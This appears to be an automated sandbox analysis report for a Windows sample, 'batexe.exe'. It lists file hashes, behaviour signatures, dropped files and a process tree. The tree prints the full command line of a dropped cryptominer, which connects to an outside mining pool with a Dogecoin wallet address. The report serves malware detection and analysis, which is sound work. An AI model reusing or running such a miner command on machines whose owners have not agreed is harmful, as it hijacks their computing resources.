Analysis
-
max time kernel
296s -
max time network
305s -
platform
windows10-1703_x64 -
resource
win10-20240221-ja -
resource tags
arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
24-02-2024 08:07
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240221-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20240221-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 60 b2e.exe 1096 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 1096 cpuminer-sse2.exe 1096 cpuminer-sse2.exe 1096 cpuminer-sse2.exe 1096 cpuminer-sse2.exe 1096 cpuminer-sse2.exe -
resource yara_rule behavioral1/memory/1492-4-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1492 wrote to memory of 60 1492 batexe.exe 75 PID 1492 wrote to memory of 60 1492 batexe.exe 75 PID 1492 wrote to memory of 60 1492 batexe.exe 75 PID 60 wrote to memory of 2180 60 b2e.exe 76 PID 60 wrote to memory of 2180 60 b2e.exe 76 PID 60 wrote to memory of 2180 60 b2e.exe 76 PID 2180 wrote to memory of 1096 2180 cmd.exe 79 PID 2180 wrote to memory of 1096 2180 cmd.exe 79
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Users\Admin\AppData\Local\Temp\858.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\858.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\858.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:60 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FF9.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1096
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
421KB
MD5b97da265c874d8649835e9640b002f23
SHA17593ba1dfcdb87299d154ef3dea585e370e6cc49
SHA256dbee99a6218de0fe6a9b43bba2fe5db2c8a4fa624edbacd0eff49f11ca9dca5f
SHA512248032bdc89aa0cc544357e88f27e5f31c46946d0239df22e1198c7b2c0d964543618c4c6a687198f78f9a4ba4ec6a5b5f12ac24a37c6ca7968d51a56c487364
-
Filesize
1024KB
MD555d3fcf113506e85b6cf485f08b11290
SHA1539d601fdd7e37fe22412d8c73023e21293ac62c
SHA256519083ea4de496637895b9c3dd7fa5d9fc1140325272570f09aa0d2bad46f2d3
SHA51262c0dc6a36ef819eede73c8b041fbdf579ec0ae399654a73a4628555bb84c4e1fdcf314deb659f41986204e2d92acd886dd8735a24a150a309d4035b58a33ee4
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
576KB
MD5123b922240cbd550c2004beb94ec8837
SHA1b10faa36e11c43f44cff74a9f9339ae6748fad87
SHA25671855c6a38c445d56636936b4fd31461256b3b4232381a84f68e979299800c67
SHA512f4bf53694214cc189a6ecc28e1f394ded1041717b6b91996a4a92deb22820550d169d0720e18f0c4f03fcda799f1c60aab1fdc2658d81b046967788c74e6045a
-
Filesize
964KB
MD5e3936c887d8ff0d3d5b6576733b287f6
SHA12815f61c6a1876e89b73ffedf28e17e337183b00
SHA2566f87df0e6e83b2c934e40d4bc9577f097b9213f156ae9af925e6fd781fb71ecf
SHA512b0a8f0383e6df9e6083035b225eb7a6153dcce2fa459a9e9c2aabfa595f9aa495c0f2c16a347300f322fc2f5c48db8581c2ca72df42e65d6bbebf81b0b6aaf5d
-
Filesize
180KB
MD58c3284e57326ba4235d33b89349d7ebd
SHA191c3516f4663f225839aea14e7a2354e152fc1cf
SHA25617b99a2ac4623b274ad5ceeb33e6cb6f378ede786611df6da0096d5dede6a414
SHA51275e995077dfa5e414005d9bdeabe885088a6857ca9348b4047ab3161c6d7c8764f8a1f9dbc94b0f39667047fed33d9195c34f0f4279c857f59b4dd6ac39d7527
-
Filesize
749KB
MD5903c7b88487cbe41d3f71cb7516e7912
SHA1251289a37f95f225d60a0bd156f0d40ee9b1b19e
SHA25655311599841b7cc2336d270f2ec4a36cf896822e02e541740d3a8433ff412d85
SHA5129bc7807764269b8f84a8202ae10f27054d12709cd85f6f7304b5b92e076d8ffa874dc796524799f577d02797b771eb1c79aced7d911c1ffcb3962701e60ab47a
-
Filesize
926KB
MD5e22a679b8ab3074c82ebfb62586f9f8b
SHA101c104a1e671cee5ffdd0eac717a52d7a6ca8b8d
SHA256d445a8617d97099c2f155a0be7839eeb25e7efcef9a75baa04399a4a1208e5be
SHA51262ed962f5c8da6363e8427dc9ca3b39a0e5d30e378710e4d5f9718964e64b3e2b28513c6430451a5c5834f93f5d72f36629f7d5ef40169b5ca81a84a56aebb87
-
Filesize
469KB
MD513c3ae6e3d5857ce2a2aaec365ba5de7
SHA112a9a7673be7fbe57df4edad1fd0fb04c8904d37
SHA25641e9b37d42a4f860cdb8b26ed1d84cd492ef86c32abca50d47164bd3a69bd5a5
SHA512d01fac17a91c7fd9bf5aba65ba60fdbb398bcbe5fca17bee48839a766246d8e824dfbc5e08809bfa0c87fb69e4ec5ce2a7972827479e0e120d8cc23d8476e979
-
Filesize
640KB
MD57a7d60afca7c8afc6093fa911f351fb1
SHA14880cbc27d9f6e73e8a5c6cea5fcc86dd9192835
SHA2569cc5d7eaa8f1aa76e080dacf1300a51a947fdb6421fe69e207e50876c04a7084
SHA51213fe38ffe2d3d3510ae5c7506ca463b2d2c5c3023f1a973de1555f30a59b1c3ca49bd1f837884a4656ade469beae9418e3ec6b67d570cc22a6b1c70a41a4d8c5
-
Filesize
693KB
MD510635e35a17b06e04f7cc6a2c33c3f15
SHA18f8ccd14ef8e29732c51cf86867c37ff913d303e
SHA2566dbadc0ebf1c4538b1a83d218df5f206c3db0575b6ae20828e082ae49e9d83c8
SHA51267ca18cedcd81b74b5a79a23ce0bf58767c2628efb7362405c6bd5fc9edf6f2bc9794bf139f2772a42b6a90a6438c79242fba5a9d3992154c947e22e6abe1afe
-
Filesize
560KB
MD5d1fdfaa6086cd74c14bd5d8b817dacef
SHA10534bf7d2fa228d35c79e67476f09e576f889150
SHA256be37db0e488036a06ea97cbd173c9c020a53f33c957ee0baea098fbaedf67d6f
SHA51296dcbe1fc623a4d4fc602a7b8e3167775917b46bce4a431089e650b70c2642f91e58262b7348203d7d31521a07ece37a740f2c43fd2b295f6ad84d894c7de78b
-
Filesize
449KB
MD5046436b97ca668fcf99d0fb96db06aa0
SHA121ebed78664ee6f294ca2cebf9b00ef2f994a645
SHA2569881ab696b50f775a244edbb40888792c003315d4b103f6508b0867ba0a00b54
SHA5122546776bb4c7d07cfefe1de780549b9a4b9a3bc4e834f377030ff1026c26c617c49ddd0bfead33d9548b4b6aafb785e9d9e3676e38e1d20ba42f57b8dd0d36b3
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770